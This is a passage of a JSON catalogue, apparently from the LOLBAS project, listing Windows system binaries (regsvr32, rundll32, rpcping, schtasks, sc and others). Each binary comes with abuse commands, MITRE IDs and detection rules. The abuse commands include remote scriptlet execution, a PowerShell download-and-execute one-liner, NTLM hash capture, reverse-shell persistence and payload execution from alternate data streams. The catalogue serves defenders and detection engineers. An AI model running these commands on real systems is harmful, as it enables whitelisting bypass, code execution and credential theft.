11"}],"Full_Path":[{"Path":"C:\\Windows\\regedit.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml"},{"IOC":"regedit.exe reading and writing to alternate data stream"},{"IOC":"regedit.exe should normally not be executed by end-users"}],"Resources":[{"Link":"https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Regedit/"},{"Name":"Regini.exe","Description":"Used to manipulate the registry","Author":"Oddvar Moe","Created":"2020-07-03","Commands":[{"Command":"regini.exe newfile.txt:hidden.ini","Description":"Write registry keys from data inside the Alternate data stream.","Usecase":"Write to registry","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\regini.exe"},{"Path":"C:\\Windows\\SysWOW64\\regini.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_ads.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_execution.yml"},{"IOC":"regini.exe reading from ADS"}],"Resources":[{"Link":"https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Regini/"},{"Name":"Register-cimprovider.exe","Description":"Used to register new wmi providers","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"Register-cimprovider -path \"C:\\folder\\evil.dll\"","Description":"Load the target .DLL.","Usecase":"Execute code within dll file","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Execute":"DLL"}]}],"Full_Path":[{"Path":"C:\\Windows\\System32\\Register-cimprovider.exe"},{"Path":"C:\\Windows\\SysWOW64\\Register-cimprovider.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml"},{"IOC":"Register-cimprovider.exe execution and cmdline DLL load may be supsicious"}],"Resources":[{"Link":"https://twitter.com/PhilipTsukerman/status/992021361106268161"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/"},{"Name":"Regsvcs.exe","Description":"Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"regsvcs.exe AllTheThingsx64.dll","Description":"Loads the target .DLL file and executes the RegisterClass function.","Usecase":"Execute dll file and bypass Application whitelisting","Category":"Execute","Privileges":"User","MitreID":"T1218.009","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Execute":"DLL"},{"Input":"Custom Format"}]},{"Command":"regsvcs.exe AllTheThingsx64.dll","Description":"Loads the target .DLL file and executes the RegisterClass function.","Usecase":"Execute dll file and bypass Application whitelisting","Category":"AWL Bypass","Privileges":"Local Admin","MitreID":"T1218.009","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Execute":"DLL"},{"Input":"Custom Format"}]}],"Full_Path":[{"Path":"c:\\Windows\\Microsoft.NET\\Framework\\v*\\regsvcs.exe"},{"Path":"c:\\Windows\\Microsoft.NET\\Framework64\\v*\\regsvcs.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"Splunk":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regsvcs_with_network_connection.yml"}],"Resources":[{"Link":"https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/"},{"Link":"https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/"},{"Link":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/"},{"Name":"Regsvr32.exe","Description":"Used by Windows to register dlls","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll","Description":"Execute the specified remote .SCT script with scrobj.dll.","Usecase":"Execute code from remote scriptlet, bypass Application whitelisting","Category":"AWL Bypass","Privileges":"User","MitreID":"T1218.010","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"regsvr32.exe /s /u /i:file.sct scrobj.dll","Description":"Execute the specified local .SCT script with scrobj.dll.","Usecase":"Execute code from scriptlet, bypass Application whitelisting","Category":"AWL Bypass","Privileges":"User","MitreID":"T1218.010","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll","Description":"Execute the specified remote .SCT script with scrobj.dll.","Usecase":"Execute code from remote scriptlet, bypass Application whitelisting","Category":"Execute","Privileges":"User","MitreID":"T1218.010","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"regsvr32.exe /s /u /i:file.sct scrobj.dll","Description":"Execute the specified local .SCT script with scrobj.dll.","Usecase":"Execute code from scriptlet, bypass Application whitelisting","Category":"Execute","Privileges":"User","MitreID":"T1218.010","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\regsvr32.exe"},{"Path":"C:\\Windows\\SysWOW64\\regsvr32.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"IOC":"regsvr32.exe retrieving files from Internet"},{"IOC":"regsvr32.exe executing scriptlet (sct) files"},{"IOC":"DotNet CLR libraries loaded into regsvr32.exe"},{"IOC":"DotNet CLR Usage Log - regsvr32.exe.log"}],"Resources":[{"Link":"https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/"},{"Link":"https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/"},{"Link":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"},{"Name":"Replace.exe","Description":"Used to replace file with another file","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"replace.exe C:\\Source\\File.cab C:\\Destination /A","Description":"Copy file.cab to destination","Usecase":"Copy files","Category":"Copy","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"replace.exe \\\\webdav.host.com\\foo\\bar.exe c:\\outdir /A","Description":"Download/Copy bar.exe to outdir","Usecase":"Download file","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\replace.exe"},{"Path":"C:\\Windows\\SysWOW64\\replace.exe"}],"Detection":[{"IOC":"Replace.exe retrieving files from remote server"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml"}],"Resources":[{"Link":"https://twitter.com/elceef/status/986334113941655553"},{"Link":"https://twitter.com/elceef/status/986842299861782529"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Replace/"},{"Name":"Rpcping.exe","Description":"Used to verify rpc connection","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM","Description":"Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.","Usecase":"Capture credentials on a non-standard port","Category":"Credentials","Privileges":"User","MitreID":"T1003","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"rpcping /s 10.0.0.35 /e 9997 /a connect /u NTLM","Description":"Trigger an authenticated RPC call to the target server (/s) that could be relayed to a privileged resource (Sign not Set).","Usecase":"Relay a NTLM authentication over RPC (ncacn_ip_tcp) on a custom port","Category":"Credentials","Privileges":"User","MitreID":"T1187","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\rpcping.exe"},{"Path":"C:\\Windows\\SysWOW64\\rpcping.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml"}],"Resources":[{"Link":"https://github.com/vysec/RedTips"},{"Link":"https://twitter.com/vysecurity/status/974806438316072960"},{"Link":"https://twitter.com/vysecurity/status/873181705024266241"},{"Link":"https://twitter.com/splinter_code/status/1421144623678988298"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Rpcping/"},{"Name":"Rundll32.exe","Description":"Used by Windows to execute dll files","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"rundll32.exe AllTheThingsx64,EntryPoint","Description":"AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.","Usecase":"Execute dll file","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Execute":"DLL"}]},{"Command":"rundll32.exe \\\\10.10.10.10\\share\\payload.dll,EntryPoint","Description":"Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.","Usecase":"Execute DLL from SMB share.","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Execute":"DLL"}]},{"Command":"rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();new%20ActiveXObject(\"WScript.Shell\").Run(\"powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');\")","Description":"Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.","Usecase":"Execute code from Internet","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"rundll32.exe javascript:\"\\..\\mshtml.dll,RunHTMLApplication \";eval(\"w=new%20ActiveXObject(\\\"WScript.Shell\\\");w.run(\\\"calc\\\");window.close()\");","Description":"Use Rundll32.exe to execute a JavaScript script that runs calc.exe.","Usecase":"Proxy execution","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WScript.Shell\").run(\"calc.exe\",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}","Description":"Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.","Usecase":"Proxy execution","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test\")","Description":"Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.","Usecase":"Execute code from Internet","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"rundll32 \"C:\\ads\\file.txt:ADSDLL.dll\",DllMain","Description":"Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).","Usecase":"Execute code from alternate data stream","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Execute":"DLL"}]},{"Command":"rundll32.exe -sta {CLSID}","Description":"Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID.","Usecase":"Execute a DLL/EXE COM server payload or ScriptletURL code.","Category":"Execute","Privileges":"User","MitreID":"T1218.011","OperatingSystem":"Windows 10 (and likely previous versions), Windows 11","Tags":[{"Execute":"DLL"}]}],"Full_Path":[{"Path":"C:\\Windows\\System32\\rundll32.exe"},{"Path":"C:\\Windows\\SysWOW64\\rundll32.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml"},{"IOC":"Outbount Internet/network connections made from rundll32"},{"IOC":"Suspicious use of cmdline flags such as -sta"}],"Resources":[{"Link":"https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/"},{"Link":"https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7"},{"Link":"https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/"},{"Link":"https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/"},{"Link":"https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/"},{"Link":"https://github.com/sailay1996/expl-bin/blob/master/obfus.md"},{"Link":"https://github.com/sailay1996/misc-bin/blob/master/rundll32.md"},{"Link":"https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90"},{"Link":"https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Rundll32/"},{"Name":"Runexehelper.exe","Description":"Launcher process","Author":"Grzegorz Tworek","Created":"2022-12-13","Commands":[{"Command":"runexehelper.exe c:\\windows\\system32\\calc.exe","Description":"Launches the specified exe. Prerequisites: (1) diagtrack_action_output environment variable must be set to an existing, writable folder; (2) runexewithargs_output.txt file cannot exist in the folder indicated by the variable.","Usecase":"Executes arbitrary code","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022"}],"Full_Path":[{"Path":"c:\\windows\\system32\\runexehelper.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_runexehelper.yml"},{"IOC":"c:\\windows\\system32\\runexehelper.exe is run"},{"IOC":"Existence of runexewithargs_output.txt file"}],"Resources":[{"Link":"https://twitter.com/0gtweet/status/1206692239839289344"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/"},{"Name":"Runonce.exe","Description":"Executes a Run Once Task that has been configured in the registry","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"Runonce.exe /AlternateShellStartup","Description":"Executes a Run Once Task that has been configured in the registry","Usecase":"Persistence, bypassing defensive counter measures","Category":"Execute","Privileges":"Administrator","MitreID":"T1218","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\runonce.exe"},{"Path":"C:\\Windows\\SysWOW64\\runonce.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_runonce_execution.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/2926e98c5d998706ef7e248a63fb0367c841f685/rules/windows/persistence_run_key_and_startup_broad.toml"},{"IOC":"Registy key add - HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\YOURKEY"}],"Resources":[{"Link":"https://twitter.com/pabraeken/status/990717080805789697"},{"Link":"https://cmatskas.com/configure-a-runonce-task-on-windows/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Runonce/"},{"Name":"Runscripthelper.exe","Description":"Execute target PowerShell script","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"runscripthelper.exe surfacecheck \\\\?\\C:\\Test\\Microsoft\\Diagnosis\\scripts\\test.txt C:\\Test","Description":"Execute the PowerShell script named test.txt","Usecase":"Bypass constrained language mode and execute Powershell script","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10"}],"Full_Path":[{"Path":"C:\\Windows\\WinSxS\\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\\Runscripthelper.exe"},{"Path":"C:\\Windows\\WinSxS\\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\\Runscripthelper.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_runscripthelper.yml"},{"BlockRule":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"IOC":"Event 4014 - Powershell logging"},{"IOC":"Event 400"}],"Resources":[{"Link":"https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/"},{"Name":"Sc.exe","Description":"Used by Windows to manage services","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"sc create evilservice binPath=\"\\\"c:\\\\ADS\\\\file.txt:cmd.exe\\\" /c echo works > \\\"c:\\ADS\\works.txt\\\"\" DisplayName= \"evilservice\" start= auto\\ & sc start evilservice","Description":"Creates a new service and executes the file stored in the ADS.","Usecase":"Execute binary file hidden inside an alternate data stream","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"sc config <existing> binPath=\"\\\"c:\\\\ADS\\\\file.txt:cmd.exe\\\" /c echo works > \\\"c:\\ADS\\works.txt\\\"\" & sc start <existing>","Description":"Modifies an existing service and executes the file stored in the ADS.","Usecase":"Execute binary file hidden inside an alternate data stream","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\sc.exe"},{"Path":"C:\\Windows\\SysWOW64\\sc.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_susp_service_creation.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_service_path_modification.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/sc_exe_manipulating_windows_services.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/lateral_movement_cmd_service.toml"},{"IOC":"Unexpected service creation"},{"IOC":"Unexpected service modification"}],"Resources":[{"Link":"https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Sc/"},{"Name":"Schtasks.exe","Description":"Schedule periodic tasks","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"schtasks /create /sc minute /mo 1 /tn \"Reverse shell\" /tr c:\\some\\directory\\revshell.exe","Description":"Create a recurring task to execute every minute.","Usecase":"Create a recurring task to keep reverse shell session(s) alive","Category":"Execute","Privileges":"User","MitreID":"T1053.005","OperatingSystem":"Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"schtasks /create /s targetmachine /tn \"MyTask\" /tr c:\\some\\directory\\notevil.exe /sc daily","Description":"Create a scheduled task on a remote computer for persistence/lateral movement","Usecase":"Create a remote task to run daily relative to the the time of creation","Category":"Execute","Privileges":"Administrator","MitreID":"T1053.005","OperatingSystem":"Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"c:\\windows\\system32\\schtasks.exe"},{"Path":"c:\\windows\\syswow64\\schtasks.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_schtasks_creation.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/persistence_local_scheduled_task_creation.toml"},{"Splunk":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/schtasks_scheduling_job_on_remote_system.yml"},{"IOC":"Suspicious task creation events"}],"Resources":[{"Link":"https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Schtasks/"},{"Name":"Scriptrunner.exe","Description":"Execute binary through proxy binary to evade defensive counter measures","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"Scriptrunner.exe -appvscript calc.exe","Description":"Executes calc.exe","Usecase":"Execute binary through proxy binary to evade defensive counter measures","Category":"Execute","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"ScriptRunner.exe -appvscript \"\\\\fileserver\\calc.cmd\"","Description":"Executes calc.cmd from remote server","Usecase":"Execute binary through proxy binary from external server to evade defensive counter measures","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\scriptrunner.exe"},{"Path":"C:\\Windows\\SysWOW64\\scriptrunner.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml"},{"IOC":"Scriptrunner.exe should not be in use unless App-v is deployed"}],"Resources":[{"Link":"https://twitter.com/KyleHanslovan/status/914800377580503040"},{"Link":"https://twitter.com/NickTyrer/status/914234924655312896"},{"Link":"https://github.com/MoooKitty/Code-Execution"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/"},{"Name":"Setres.exe","Description":"Configures display settings","Author":"Grzegorz Tworek","Created":"2022-10-21","Commands":[{"Command":"setres.exe -w 800 -h 600","Description":"Sets the resolution and then launches 'choice' command from the working directory.","Usecase":"Executes arbitrary code","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022"}],"Full_Path":[{"Path":"c:\\windows\\system32\\setres.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml"},{"IOC":"Unusual location for choice.exe file"},{"IOC":"Process created from choice.com binary"},{"IOC":"Existence of choice.cmd file"}],"Resources":[{"Link":"https://twitter.com/0gtweet/status/1583356502340870144"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Setres/"},{"Name":"SettingSyncHost.exe","Description":"Host Process for Setting Synchronization","Author":"Elliot Killick","Created":"2021-08-26","Commands":[{"Command":"SettingSyncHost -LoadAndRunDiagScript anything","Description":"Execute file specified in %COMSPEC%","Usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 8, Windows 8.1, Windows 10"},{"Command":"SettingSyncHost -LoadAndRunDiagScriptNoCab anything","Description":"Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\\Windows\\System32.","Usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file.","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 8, Windows 8.1, Windows 10"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\SettingSyncHost.exe"},{"Path":"C:\\Windows\\SysWOW64\\SettingSyncHost.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_settingsynchost.yml"},{"IOC":"SettingSyncHost.exe should not be run on a normal workstation"}],"Resources":[{"Link":"https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/SettingSyncHost/"},{"Name":"ssh.exe","Description":"Ssh.exe is the OpenSSH compatible client can be used to connect to Windows 10 (build 1809 and later) and Windows Server 2019 devices.","Author":"Akshat Pradhan","Created":"2021-11-08","Commands":[{"Command":"ssh localhost calc.exe","Description":"Execute calc.exe on host machine. The prompt for password can be eliminated by adding the host's public key in the user's authorized_keys file. Adversaries can do the same for execution on remote machines.","Usecase":"Execute specified command, can be used for defense evasion.","Category":"Execute","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows 10 1809, Windows Server 2019"},{"Command":"ssh -o ProxyCommand=calc.exe .","Description":"Executes calc.exe from ssh.exe","Usecase":"Performs execution of specified file, can be used as a defensive evasion.","Category":"Execute","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows 10"}],"Full_Path":[{"Path":"c:\\windows\\system32\\OpenSSH\\ssh.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml"},{"IOC":"Event ID 4624 with process name C:\\Windows\\System32\\OpenSSH\\sshd.exe."},{"IOC":"command line arguments specifying 